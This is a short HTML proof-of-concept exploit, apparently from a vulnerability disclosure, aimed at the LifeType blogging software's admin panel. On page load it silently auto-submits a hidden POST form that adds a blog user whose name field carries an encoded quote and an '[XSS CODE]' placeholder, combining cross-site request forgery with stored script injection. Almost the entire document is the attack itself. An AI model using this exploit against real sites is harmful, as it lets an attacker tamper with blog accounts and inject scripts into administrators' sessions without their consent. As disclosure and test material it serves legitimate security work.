<html> <head></head> #Vulnerabily discovered by Khashayar Fereidani Or Dr.Crash <body onLoad=javascript:document.form.submit()> <form action="http://www.example.com/lifetype/admin.php?op=editArticleCategories" method="POST" name="form"> <input type="hidden" name="newBlogUserName" value="&#x22;&#x20;[XSS CODE]"> <input type="hidden" name="Add this user" value="Add"> <input type="hidden" name="op" value="addBlogUser"> </form> </body> </html>